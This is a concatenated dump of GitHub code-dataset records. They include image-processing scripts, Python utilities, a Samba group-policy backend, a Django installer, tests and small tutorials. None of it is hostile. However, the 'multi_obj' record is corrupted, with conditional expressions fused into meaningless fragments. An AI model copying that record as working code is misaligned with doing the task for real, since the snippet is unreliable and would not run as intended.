3]])\nhistogram_equalization(arr)\n","repo_name":"M7mdSh3banX/Image-Processing-Assignments","sub_path":"histogram-equalization-lab-example.py","file_name":"histogram-equalization-lab-example.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2661446631","text":"import numpy as np\nimport pandas as pd\n\n\ndef expand_data(data): \n d1 = np.zeros([data.shape[0]*3, data.shape[1], data.shape[2]])\n \n for i in range(data.shape[0]):\n if i >= (data.shape[0] - 2):\n d1[i*3:(i*3+data.shape[0]-i),:,:] = data[i:,:,:] \n else:\n d1[i*3:(i*3)+3,:,:] = data[i:i+3,:,:]\n \n \n d2 = np.zeros([d1.shape[0], d1.shape[1]*3, d1.shape[2]])\n \n for j in range(d1.shape[1]):\n if j >= (d1.shape[1] - 2):\n d2[:,j*3:(j*3+d1.shape[1]-j),:] = d1[:,j:,:] \n else:\n d2[:,j*3:(j*3)+3,:] = d1[:,j:(j+3),:]\n return d2\n \ndef preprocess_kernel(data):\n data1 = np.zeros(data.shape)\n data2 = np.zeros(data.shape)\n \n for i in range(int(data.shape[0]/3)):\n k = data[(i*3):(i*3+3),:,:]\n data1[i*3,:,:] = 2*k[0,:,:] - k[1,:,:] - k[2,:,:] \n data1[i*3+1,:,:] = 2*k[1,:,:] - k[0,:,:] - k[2,:,:]\n data1[i*3+2,:,:] = 2*k[2,:,:] - k[0,:,:] - k[1,:,:]\n \n for i in range(int(data.shape[1]/3)):\n k = data[:,(i*3):(i*3+3),:]\n data1[:,i*3,:] = 2*k[:,0,:] - k[:,1,:] - k[:,2,:] \n data1[:,i*3+1,:] = 2*k[:,1,:] - k[:,0,:] - k[:,2,:]\n data1[:,i*3+2,:] = 2*k[:,2,:] - k[:,0,:] - k[:,1,:]\n \n return data1 + data2\n \n \n\ndef self_define_cnn_kernel_process(data):\n '''\n 1. expand data from (x, y, z) to (x*3, y*3, z) (Because Conv2D convolution with stride (3,3) for our preprocess)\n \n 2. 3*3 kernel process:\n \n [2*V_1 - V_2 - V3\n 2*V_2 - V_1 - V3\n 2*V_3 - V_1 - V2]\n\n +\n\n [2*Vt_1 - Vt_2 - Vt_3, 2*Vt_2 - Vt_1 - Vt_3, 2*Vt_3 - Vt_1 - Vt_2]\n \n '''\n #input\n data_final = np.zeros([data.shape[0], data.shape[1]*3, data.shape[2]*3, data.shape[3]])\n for i in range(data.shape[0]):\n d1 = data[i,:,:,:]\n d1_expand = expand_data(d1)\n d1_final = preprocess_kernel(d1_expand)\n data_final[i,:,:,:] = d1_final\n print(data_final.shape)\n return data_final","repo_name":"AbnerYang/TII_Wide-Deep_Electricity_Theft_Detection","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"86507900722","text":"import numpy as np\n\nclass multi_obj(object):\n \n def __init__(self,centers,radii,rect_dim):\n self.circle_centers = []\n self.rect_centers = []\n self.radius = []\n self.ab = []\n for i,c in enumerate(centers):\n if i=b1 and t=b2 and t0 and tb1 and tb2 and tb3 and t100 :\n raise ValueError(\"score must between 0 and 100\")\n self._score=value\n\n# @property的实现较为复杂,把一个getter方法变成属性,只要加上@property就可以了,此时,property又创建了另一个装饰器@score.setter,负责吧一个setter方法变成属性赋值\n\ns=Student()\ns.score=60\nprint( s.score)\ns.score=-10\n#定义只读属性,只定义getter方法,不定义setter方法就可以了\n","repo_name":"AnnDWang/python","sub_path":"basic/learn13/using_property.py","file_name":"using_property.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24961395898","text":"import argparse\nimport sys\n\nfrom pylauncher.installer import compile_python, fetch_python, unzip_tar\nfrom pylauncher.launcher import run_python\nfrom pylauncher.config import config\n\n\nclass PyLauncher:\n \"\"\"An interface to the main CLI\"\"\"\n\n def __init__(self):\n self.python_arguments = [] # Arguments to pass onto the python executable\n\n self.parser = argparse.ArgumentParser(\n prog=\"pylauncher\", description=\"A python launcher and version manager\"\n )\n\n self.parser.add_argument(\n \"-ls\", \"--list\", help=\"Lists the available python versions\"\n )\n\n self.parser.add_argument(\n \"command\", help=\"Subcommand to run\", nargs=\"?\", default=None\n )\n\n def install(self):\n \"\"\"Installs the provided python version\"\"\"\n\n parser = argparse.ArgumentParser(\n prog=\"pylauncher\", description=\"Install the provided python version\"\n )\n\n parser.add_argument(\"version\", type=float, help=\"The python version to install\")\n args, unknown = parser.parse_known_args(sys.argv[2:])\n version = args.version\n\n temp_tarpath = fetch_python(\n version\n ) # Install the python version from python.org\n unzip_tar(temp_tarpath) # Unzip the downloaded tar file\n compile_python(version) # Compile the newly downloaded python version\n\n print(f\"Successfully installed python {version}\")\n\n self.python_arguments.append(\n unknown\n ) # Add unknown args to be passed onto the main python executable\n\n def default(self):\n \"\"\"Sets the default python version, and if not installed, installs it\"\"\"\n\n parser = argparse.ArgumentParser(\n prog=\"pylauncher\", description=\"Set the default python version\"\n )\n\n parser.add_argument(\n \"version\", type=float, help=\"The python version to set as the default\"\n )\n args, unknown = parser.parse_known_args(sys.argv[2:])\n version = args.version\n\n config[\"PYTHON_VERSION\"] = version\n\n self.python_arguments.append(\n unknown\n ) # Add unknown args to be passed onto the main python executable\n\n def run_python(self):\n \"\"\"Launches the python executable\"\"\"\n run_python(*self.python_arguments)\n\n def run(self):\n \"\"\"Runs the argument parser\"\"\"\n\n if len(sys.argv) == 1:\n self.run_python()\n sys.exit(1)\n\n args, unknown = self.parser.parse_known_args(sys.argv[1:])\n self.python_arguments.extend(unknown)\n\n if args.command is None:\n self.run_python()\n return\n\n if not hasattr(self, str(args.command)):\n self.python_arguments.append(args.command)\n self.run_python()\n return\n\n subcommand = getattr(self, args.command) # Dispatch to correct function\n\n subcommand()\n self.run_python()\n","repo_name":"AbooMinister25/pylauncher","sub_path":"pylauncher/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4677969998","text":"import io\nfrom utils import get_complete_df\nimport pypolars as pl\n\n\ndef test_to_from_buffer():\n df = get_complete_df()\n df = df.drop(\"strings_nulls\")\n\n for to_fn, from_fn in zip(\n [df.to_parquet, df.to_csv], [df.read_parquet, df.read_csv]\n ):\n f = io.BytesIO()\n to_fn(f)\n f.seek(0)\n\n df_1 = from_fn(f)\n assert df.frame_equal(df_1, null_equal=True)\n\n\ndef test_read_web_file():\n url = \"https://raw.githubusercontent.com/ritchie46/polars/master/examples/aggregate_multiple_files_in_chunks/datasets/foods1.csv\"\n df = pl.read_csv(url)\n assert df.shape == (27, 4)\n","repo_name":"rich-murphey/polars","sub_path":"py-polars/tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"25607961543","text":"from pymongo import MongoClient\r\n\r\n\r\nclient = MongoClient('localhost', 27017)\r\n# 连接test数据库,没有则自动创建\r\ndb = client.test\r\n# 使用zyp集合,没有则自动创建\r\nmy_set = db.zyp\r\n\r\nmy_set.insert_one({\"name\":\"carina\",\"age\":18,\"job\":\"software test\"})\r\n","repo_name":"teddy-mc/python","sub_path":"Teddy--MongoDB和Python.py","file_name":"Teddy--MongoDB和Python.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31815080049","text":"from django import template\nfrom datetime import datetime\nfrom django.utils.timezone import utc\nimport re\n\nregister = template.Library()\n\n# фильтр, возвращающий значение переменной\n@register.filter()\ndef show(value):\n return f'{value}'\n\n# фильтр изменения формата даты\n@register.filter()\ndef date_format(value):\n return datetime.strftime(value, '%d-%b-%Y')\n\n\n# фильтр цензурирования\n@register.filter()\ndef censor(text):\n if isinstance(text, str):\n # список нежелательных слов\n cens_list = ['редиска', 'чудак']\n\n filter_text = re.split(r\"\\W\", text)\n for word in filter_text:\n if word in cens_list:\n cens_word = word[0] + '*' * (len(word) - 1)\n text = text.replace(word, cens_word)\n return text\n else:\n print(f'Переменная {text} не может быть обработана, так как не является строкой :(')\n","repo_name":"kulstas/moykotel","sub_path":"moykotel/templatetags/custom_filters.py","file_name":"custom_filters.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8330126571","text":"# =============================================================================\n# Minet Utils\n# =============================================================================\n#\n# Miscellaneous helper function used throughout the library.\n#\nimport re\nimport hashlib\nimport json\nimport yaml\nimport time\nimport string\nimport functools\nimport dateparser\nfrom random import uniform\n\nfrom minet.exceptions import DefinitionInvalidFormatError\n\n\ndef noop(*args, **kwargs):\n pass\n\n\ndef fuzzy_int(value):\n try:\n return int(value)\n except ValueError:\n return int(float(value))\n\n\ndef md5(string):\n h = hashlib.md5()\n h.update(string.encode())\n return h.hexdigest()\n\n\nDOUBLE_QUOTES_RE = re.compile(r'\"')\n\n\ndef fix_ensure_ascii_json_string(s):\n try:\n return json.loads('\"%s\"' % DOUBLE_QUOTES_RE.sub('\\\\\"', s))\n except json.decoder.JSONDecodeError:\n return s\n\n\nclass RateLimiter(object):\n \"\"\"\n Naive rate limiter context manager with smooth output.\n\n Note that it won't work in a multi-threaded environment.\n\n Args:\n max_per_period (int): Maximum number of calls per period.\n period (float): Duration of a period in seconds. Defaults to 1.0.\n\n \"\"\"\n\n def __init__(self, max_per_period, period=1.0, with_budget=False):\n max_per_second = max_per_period / period\n self.min_interval = 1.0 / max_per_second\n self.max_budget = period / 4\n self.budget = 0.0\n self.last_entry = None\n self.with_budget = with_budget\n\n def enter(self):\n self.last_entry = time.perf_counter()\n\n def __enter__(self):\n return self.enter()\n\n def exit_with_budget(self):\n running_time = time.perf_counter() - self.last_entry\n\n delta = self.min_interval - running_time\n\n # Consuming budget\n if delta >= self.budget:\n delta -= self.budget\n self.budget = 0\n else:\n self.budget -= delta\n delta = 0\n\n # Do we need to sleep?\n if delta > 0:\n time.sleep(delta)\n elif delta < 0:\n self.budget -= delta\n\n # Clamping budget\n # TODO: this should be improved by a circular buffer of last calls\n self.budget = min(self.budget, self.max_budget)\n\n def exit(self):\n running_time = time.perf_counter() - self.last_entry\n\n delta = self.min_interval - running_time\n\n if delta > 0:\n time.sleep(delta)\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n if self.with_budget:\n return self.exit_with_budget()\n\n return self.exit()\n\n\nclass RetryableIterator(object):\n \"\"\"\n Iterator exposing a #.retry method that will make sure the next item\n is the same as the current one.\n \"\"\"\n\n def __init__(self, iterator):\n self.iterator = iter(iterator)\n self.current_value = None\n self.retried = False\n self.retries = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.retried:\n self.retried = False\n return self.current_value\n\n self.retries = 0\n self.current_value = next(self.iterator)\n return self.current_value\n\n def retry(self):\n self.retries += 1\n self.retried = True\n\n\nclass RateLimitedIterator(object):\n \"\"\"\n Handy iterator wrapper that will yield its items while respecting a given\n rate limit and that will not sleep needlessly when the iterator is\n finally fully consumed.\n \"\"\"\n\n def __init__(self, iterator, max_per_period, period=1.0):\n self.iterator = RetryableIterator(iterator)\n self.rate_limiter = RateLimiter(max_per_period, period)\n self.empty = False\n\n try:\n self.next_value = next(self.iterator)\n except StopIteration:\n self.next_value = None\n self.empty = True\n\n @property\n def retries(self):\n return self.iterator.retries\n\n def retry(self):\n return self.iterator.retry()\n\n def __iter__(self):\n if self.empty:\n return\n\n while True:\n self.rate_limiter.enter()\n\n yield self.next_value\n\n # NOTE: if the iterator is fully consumed, this will raise StopIteration\n # and skip the exit part that could sleep needlessly\n try:\n self.next_value = next(self.iterator)\n except StopIteration:\n return\n\n self.rate_limiter.exit()\n\n\nclass RateLimiterState(object):\n def __init__(self, max_per_period, period=1.0):\n max_per_second = max_per_period / period\n self.min_interval = 1.0 / max_per_second\n self.last_entry = None\n\n def wait_if_needed(self):\n if self.last_entry is None:\n return\n\n running_time = time.perf_counter() - self.last_entry\n delta = self.min_interval - running_time\n\n if delta > 0:\n time.sleep(delta)\n\n def update(self):\n self.last_entry = time.perf_counter()\n\n\ndef rate_limited(max_per_period, period=1.0):\n state = RateLimiterState(max_per_period, period)\n\n def decorate(fn):\n\n @functools.wraps(fn)\n def decorated(*args, **kwargs):\n state.wait_if_needed()\n result = fn(*args, **kwargs)\n state.update()\n\n return result\n\n return decorated\n\n return decorate\n\n\ndef rate_limited_from_state(state):\n def decorate(fn):\n\n @functools.wraps(fn)\n def decorated(*args, **kwargs):\n state.wait_if_needed()\n result = fn(*args, **kwargs)\n state.update()\n\n return result\n\n return decorated\n\n return decorate\n\n\ndef rate_limited_method(attr='rate_limiter_state'):\n def decorate(fn):\n\n @functools.wraps(fn)\n def decorated(self, *args, **kwargs):\n state = getattr(self, attr)\n\n if not isinstance(state, RateLimiterState):\n raise ValueError\n\n state.wait_if_needed()\n result = fn(self, *args, **kwargs)\n state.update()\n\n return result\n\n return decorated\n\n return decorate\n\n\nclass PseudoFStringFormatter(string.Formatter):\n def get_field(self, field_name, args, kwargs):\n result = eval(field_name, None, kwargs)\n\n return result, None\n\n\ndef load_definition(f, encoding='utf-8'):\n string_path = isinstance(f, str)\n\n if string_path:\n path = f\n f = open(path, encoding=encoding)\n else:\n path = f.name\n\n if path.endswith('.json'):\n definition = json.load(f)\n\n elif path.endswith('.yml') or path.endswith('.yaml'):\n definition = yaml.safe_load(f)\n\n else:\n raise DefinitionInvalidFormatError\n\n if string_path:\n f.close()\n\n return definition\n\n\ndef nested_get(path, o, default=None):\n if isinstance(path, str):\n path = path.split('.')\n\n for step in path:\n try:\n if callable(getattr(o, '__getitem__')):\n o = o[step]\n else:\n getattr(o, step)\n except (IndexError, KeyError, AttributeError):\n return default\n\n return o\n\n\ndef sleep_with_entropy(seconds, max_random_addendum):\n random_addendum = uniform(0, max_random_addendum)\n time.sleep(seconds + random_addendum)\n\n\nINTERVALS = [\n ('weeks', 60 * 60 * 24 * 7), # 60 * 60 * 24 * 7\n ('days', 60 * 60 * 24), # 60 * 60 * 24\n ('hours', 60 * 60), # 60 * 60\n ('minutes', 60),\n ('seconds', 1)\n]\n\n\ndef prettyprint_seconds(seconds, granularity=None):\n result = []\n\n for name, count in INTERVALS:\n value = seconds // count\n\n if value:\n seconds -= value * count\n\n if value == 1:\n name = name.rstrip('s')\n\n result.append('%i %s' % (value, name))\n\n if not result:\n return '%.2f seconds' % seconds\n\n if granularity is not None:\n result = result[:granularity]\n\n return ', '.join(result)\n\n\ndef parse_date(formatted_date, lang='en'):\n try:\n parsed = dateparser.parse(\n formatted_date,\n languages=[lang]\n )\n except ValueError:\n return None\n\n return parsed.isoformat().split('.', 1)[0]\n","repo_name":"lebelgique/minet","sub_path":"minet/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"7880229550","text":"class Solution:\n def str2tree(self, s):\n # Find (, then find end of left tree. The right tree starts after that.\n begin_of_left = s.find(\"(\")\n if begin_of_left < 0:\n # Either all num or none.\n return TreeNode(int(s)) if s else None\n # Now find the end of the left tree.\n paren_count = 0\n index = begin_of_left\n while index < len(s):\n if s[index] == \"(\":\n paren_count +=1\n elif s[index] == \")\":\n paren_count -= 1\n if paren_count == 0:\n break\n index += 1\n\n end_of_left = index\n left_indices = begin_of_left+1, end_of_left\n right_indices = end_of_left + 2, -1\n left_tree = self.str2tree(s[left_indices[0]: left_indices[1]])\n right_tree = self.str2tree(s[right_indices[0]: right_indices[1]])\n # Note that the left and right trees are without the () that wraps around them.\n root = TreeNode(int(s[:begin_of_left]))\n root.left = left_tree\n root.right = right_tree\n return root","repo_name":"YihaoGuo2018/leetcode_python_2","sub_path":"Construct Binary Tree from String.py","file_name":"Construct Binary Tree from String.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15036541364","text":"import os\nimport fnmatch\nimport shutil\nimport PyPDF2\nfrom pathlib import Path\n\n# Enter your directories here. Use absolute paths.\nsource_directory = Path(\"path/to/zip\") # Where zip file is located\n\n\ndef check_directory():\n if not os.path.exists(source_directory):\n raise Exception(\"The specified source directory does not exist. Please check your spelling and try again:\"\n \"{}\".format(source_directory))\n\n\ndef create_directories(root_directory):\n global unzipping_directory\n global pickup_directory\n os.mkdir(os.path.join(root_directory, 'drop-area'))\n os.mkdir(os.path.join(root_directory, 'pickup-area'))\n unzipping_directory = os.path.join(root_directory, 'drop-area')\n pickup_directory = os.path.join(root_directory, 'pickup-area')\n\n\ndef unzip_to_new_directory(start_directory, end_directory):\n pattern = \"*.zip\"\n for root, dirs, files in os.walk(os.path.abspath(start_directory)):\n for filename in fnmatch.filter(files, pattern):\n shutil.unpack_archive(os.path.join(root, filename), end_directory)\n\n\ndef scale(pdf_path, final_path):\n for file in os.listdir(pdf_path):\n print(file)\n pdf_file_obj = open(os.path.join(pdf_path, file), 'rb')\n pdf_reader = PyPDF2.PdfFileReader(pdf_file_obj)\n pdf_writer = PyPDF2.PdfFileWriter() # We will be writing to a new file with scaled dimensions\n\n for page in range(pdf_reader.numPages):\n page_obj = pdf_reader.getPage(page)\n page_obj.scaleTo(612, 792) # Measured in points, multiply by 72 for inches\n pdf_writer.addPage(page_obj)\n\n new_file = open(os.path.join(final_path, file), 'wb')\n pdf_writer.write(new_file)\n pdf_file_obj.close()\n new_file.close()\n\n\ndef zip_folder(zip_this_directory):\n shutil.make_archive(os.path.join(source_directory, 'archive'), 'zip', zip_this_directory)\n\n\ndef remove_leftover_files():\n shutil.rmtree(unzipping_directory)\n shutil.rmtree(pickup_directory)\n\n\nif __name__ == '__main__':\n check_directory()\n create_directories(source_directory)\n unzip_to_new_directory(source_directory, unzipping_directory)\n scale(unzipping_directory, pickup_directory)\n zip_folder(pickup_directory)\n remove_leftover_files()\n print('Complete')\n","repo_name":"wesleykruger/pdf-resizer","sub_path":"resize_files.py","file_name":"resize_files.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20008675433","text":"import cv2\r\nimport numpy as np\r\n\r\ntheta = 25 * np.pi / 180\r\nimg = cv2.imread(\"/home/magic/data_dl/tdmc_objs/td_all/JPEGImages/miner_00269.jpg\")\r\n\r\n# x轴的剪切shear变换,角度45°\r\nM_shear = np.array([\r\n [1, -np.tan(theta), 0],\r\n [0, 1, 0]\r\n], dtype=np.float32)\r\n\r\nimg_sheared = cv2.warpAffine(img, M_shear, (1000, 1500), cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=255)\r\ncv2.imwrite('img_sheared.jpg', img_sheared)\r\n\r\nM_rotate = np.array([\r\n [np.cos(-theta), -np.sin(-theta), 0],\r\n [np.sin(-theta), np.cos(-theta), 0]\r\n], dtype=np.float32)\r\n\r\nimg_rotated = cv2.warpAffine(img_sheared, M_rotate, (800, 1200), cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=255)\r\ncv2.imwrite('img_rotated.jpg', img_rotated)\r\n\r\n","repo_name":"magic428/work_note","sub_path":"tools-dl-cv/warpAffine_exmps.py","file_name":"warpAffine_exmps.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28214800187","text":"from sense_hat import SenseHat\nfrom time import sleep\nimport random\n\nsense = SenseHat()\n\nsense.clear()\n\ndef randNumb(endOfRange):\n return random.randint(0,endOfRange)\n\nwhile(1):\n for y in range(0,8):\n for x in range(0,8):\n sense.set_pixel(x, y, (randNumb(255),randNumb(255),randNumb(255)))\n sleep(0.1)\n sense.clear()\n sleep(1)\n \n ","repo_name":"gdmgent-1819-iot/labo1-gdm-1718-jantemme","sub_path":"pixelator.py","file_name":"pixelator.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3627040803","text":"from django.core.management.base import BaseCommand, CommandError\nfrom env.models import Environ\nfrom project.models import Project\nfrom django.contrib.auth.models import User\nimport os\nfrom django.conf import settings\nimport getpass\nfrom env.tasks import restart\n\n\ndef edit_supervisor_conf():\n search = 'include /etc/nginx/conf.d/*.conf;'\n repl = 'include /etc/nginx/conf.d/*.conf; \\n include %s/*.conf;' % os.path.join(settings.BASE_DIR,'ci-conf')\n path = '/etc/nginx/nginx.conf'\n print('Edit %s' % path) \n with open(path, 'r') as f:\n tpl = f.read();\n tpl = tpl.replace(search,repl)\n with open(path,'w') as f:\n f.write(tpl)\n\n\ndef edit_nginx_conf():\n search = 'include /etc/nginx/conf.d/*.conf;'\n repl = 'include /etc/nginx/conf.d/*.conf; \\n include %s/*.conf;' % os.path.join(settings.BASE_DIR,'env-conf', 'nginx')\n path = '/etc/nginx/nginx.conf'\n print('Edit %s' % path) \n with open(path, 'r') as f:\n tpl = f.read();\n tpl = tpl.replace(search,repl)\n with open(path,'w') as f:\n f.write(tpl)\n\ndef make_conf():\n with open(os.path.join(settings.BASE_DIR,'ci-conf','django-ci.conf',), 'r') as f:\n tpl = f.read()\n tpl = tpl.replace('%base_dir%', str(settings.BASE_DIR))\n tpl = tpl.replace('%user%', getpass.getuser())\n \n with open(os.path.join(settings.BASE_DIR,'ci-conf','django-ci.conf',), 'w') as f:\n f.write(tpl)\n\n\ndef create_dirs():\n if not os.path.isdir(os.path.join(settings.BASE_DIR,'logs')):\n print('Creating log dir')\n os.mkdir(os.path.join(settings.BASE_DIR,'logs'))\n if not os.path.isdir(os.path.join(settings.BASE_DIR,'env-conf')):\n print('Creating conf dir')\n os.mkdir(os.path.join(settings.BASE_DIR,'env-conf'))\n os.mkdir(os.path.join(settings.BASE_DIR,'env-conf','nginx'))\n os.mkdir(os.path.join(settings.BASE_DIR,'env-conf','supervisor'))\nclass Command(BaseCommand):\n \n def handle(self, *args, **options):\n print('Installation...')\n create_dirs()\n make_conf()\n edit_nginx_conf()\n restart()\n ","repo_name":"zdimon/django-ci","sub_path":"ci/main/management/commands/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17185582364","text":"import os\n# Facility to determine GPTs for user\ntry:\n from samba.gpclass import check_safe_path\nexcept ImportError:\n from samba.gp.gpclass import check_safe_path\n\nfrom .applier_backend import applier_backend\nfrom storage import cache_factory, registry_factory\nfrom gpt.gpt import gpt, get_local_gpt\nfrom util.util import (\n get_machine_name,\n is_machine_name\n)\nfrom util.kerberos import (\n machine_kinit\n , machine_kdestroy\n)\nfrom util.sid import get_sid\nimport util.preg\nfrom util.logging import log\n\nclass samba_backend(applier_backend):\n __user_policy_mode_key = 'Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\UserPolicyMode'\n\n def __init__(self, sambacreds, username, domain, is_machine):\n self.cache_path = '/var/cache/gpupdate/creds/krb5cc_{}'.format(os.getpid())\n self.__kinit_successful = machine_kinit(self.cache_path)\n if not self.__kinit_successful:\n raise Exception('kinit is not successful')\n self.storage = registry_factory('registry')\n self.storage.set_info('domain', domain)\n machine_name = get_machine_name()\n machine_sid = get_sid(domain, machine_name, is_machine)\n self.storage.set_info('machine_name', machine_name)\n self.storage.set_info('machine_sid', machine_sid)\n\n # User SID to work with HKCU hive\n self.username = username\n self._is_machine_username = is_machine\n if is_machine:\n self.sid = machine_sid\n else:\n self.sid = get_sid(self.storage.get_info('domain'), self.username)\n\n self.cache = cache_factory('regpol_cache')\n self.gpo_names = cache_factory('gpo_names')\n\n # Samba objects - LoadParm() and CredentialsOptions()\n self.sambacreds = sambacreds\n\n self.cache_dir = self.sambacreds.get_cache_dir()\n logdata = dict({'cachedir': self.cache_dir})\n log('D7', logdata)\n\n def __del__(self):\n if self.__kinit_successful:\n machine_kdestroy()\n\n def get_policy_mode(self):\n '''\n Get UserPolicyMode parameter value in order to determine if it\n is possible to work with user's part of GPT. This value is\n checked only if working for user's SID.\n '''\n upm = self.storage.get_hklm_entry(self.__user_policy_mode_key)\n if upm and upm.data:\n upm = int(upm.data)\n if upm < 0 or upm > 2:\n upm = 0\n else:\n upm = 0\n\n return upm\n\n def retrieve_and_store(self):\n '''\n Retrieve settings and strore it in a database\n '''\n # Get policies for machine at first.\n machine_gpts = list()\n try:\n machine_gpts = self._get_gpts(get_machine_name(), self.storage.get_info('machine_sid'))\n except Exception as exc:\n log('F2')\n raise exc\n\n if self._is_machine_username:\n self.storage.wipe_hklm()\n self.storage.wipe_user(self.storage.get_info('machine_sid'))\n for gptobj in machine_gpts:\n try:\n gptobj.merge_machine()\n except Exception as exc:\n logdata = dict()\n logdata['msg'] = str(exc)\n log('E26', logdata)\n\n # Load user GPT values in case user's name specified\n # This is a buggy implementation and should be tested more\n else:\n user_gpts = list()\n try:\n user_gpts = self._get_gpts(self.username, self.sid)\n except Exception as exc:\n log('F3')\n raise exc\n self.storage.wipe_user(self.sid)\n\n # Merge user settings if UserPolicyMode set accordingly\n # and user settings (for HKCU) are exist.\n policy_mode = self.get_policy_mode()\n logdata = dict({'mode': upm2str(policy_mode), 'sid': self.sid})\n log('D152', logdata)\n\n if policy_mode < 2:\n for gptobj in user_gpts:\n try:\n gptobj.merge_user()\n except Exception as exc:\n logdata = dict()\n logdata['msg'] = str(exc)\n log('E27', logdata)\n\n if policy_mode > 0:\n for gptobj in machine_gpts:\n try:\n gptobj.sid = self.sid\n gptobj.merge_user()\n except Exception as exc:\n logdata = dict()\n logdata['msg'] = str(exc)\n log('E63', logdata)\n\n def _check_sysvol_present(self, gpo):\n '''\n Check if there is SYSVOL path for GPO assigned\n '''\n if not gpo.file_sys_path:\n # GPO named \"Local Policy\" has no entry by its nature so\n # no reason to print warning.\n if 'Local Policy' != gpo.name:\n logdata = dict({'gponame': gpo.name})\n log('W4', logdata)\n return False\n return True\n\n def _get_gpts(self, username, sid):\n gpts = list()\n\n log('D45', {'username': username, 'sid': sid})\n # util.windows.smbcreds\n gpos = self.sambacreds.update_gpos(username)\n log('D46')\n for gpo in gpos:\n if self._check_sysvol_present(gpo):\n path = check_safe_path(gpo.file_sys_path).upper()\n slogdata = dict({'sysvol_path': gpo.file_sys_path, 'gpo_name': gpo.display_name, 'gpo_path': path})\n log('D30', slogdata)\n gpt_abspath = os.path.join(self.cache_dir, 'gpo_cache', path)\n obj = gpt(gpt_abspath, sid)\n obj.set_name(gpo.display_name)\n gpts.append(obj)\n else:\n if 'Local Policy' == gpo.name:\n gpts.append(get_local_gpt(sid))\n\n return gpts\n\ndef upm2str(upm_num):\n '''\n Translate UserPolicyMode to string.\n '''\n result = 'Not configured'\n\n if upm_num in [1, '1']:\n result = 'Merge'\n\n if upm_num in [2, '2']:\n result = 'Replace'\n\n return result\n","repo_name":"altlinux/gpupdate","sub_path":"gpoa/backend/samba_backend.py","file_name":"samba_backend.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"21914376340","text":"from worldobject import *\nfrom picowork.psprite import *\n\n\nclass Coin(WorldObject):\n sprites = None\n\n def __init__(self, tile_map):\n super().__init__(tile_map)\n\n self.collision_tag = 'coin'\n self.collision_bounds = (-0.1, 0, 0.1, 0.2)\n\n if Coin.sprites is None:\n image = get_image('gold_s.png')\n Coin.sprites = [PSprite(image, i * 9, 0, 9, 8) for i in range(6)]\n\n self.visual = PSpriteObject(Coin.sprites[0])\n self.visual.set_position(Vector2(0, 4) / PIXEL_PER_UNIT)\n self.add_element(self.visual)\n\n def update(self, delta_time):\n super().update(delta_time)\n self.update_physics(delta_time)\n self.visual.set_image(Coin.sprites[floor(self.time * 10 % 6)])","repo_name":"Yupdown/2DGameProgramming","sub_path":"source/coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7921714639","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 30 10:13:47 2022\n\n@author: Federico Amato\n\nRead CSV data and make Pickle File\n\"\"\"\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport openpyxl\nimport pandas as pd\nimport logging\n\nfrom pathlib import Path\nROOT_DIR = Path(__file__).parent.parent.parent\n\n\ndef get_raw_data(fname):\n if str(fname).endswith('.csv'):\n df = pd.read_csv(fname, sep=';', decimal=',',\n index_col=0, \n parse_dates=True, \n infer_datetime_format=True, \n dayfirst=True)\n elif str(fname).endswith('.xlsx'):\n df = pd.read_excel(fname, decimal=',',\n index_col=0, parse_dates=True)\n df['SWC'] = df['SWC'].replace(0, np.NaN)\n df['Week'] = pd.Series(df.index).dt.isocalendar().week.values\n df['Month'] = df.index.month\n # NaN values in Precipitations and Irrigation are considered as null\n df['P'] = df['P'].fillna(0)\n df['I'] = df['I'].fillna(0)\n # Some column of the file may use dots as decimal\n # separators, so those columns are interpreted as \n # object type and must be casted to floats.\n # See for example SWC, Tavg, RHavg\n return df.astype(np.float64)\n\n\ndef make_pickle(df, out):\n try:\n df.to_pickle(out)\n except Exception:\n print(\"Something went wrong writing Pickle file.\\nTry again\")\n \n\ndef main(input_file, output_file, visualize=True):\n logging.info(f'\\n\\n{\"-\"*5} MAKE DATA 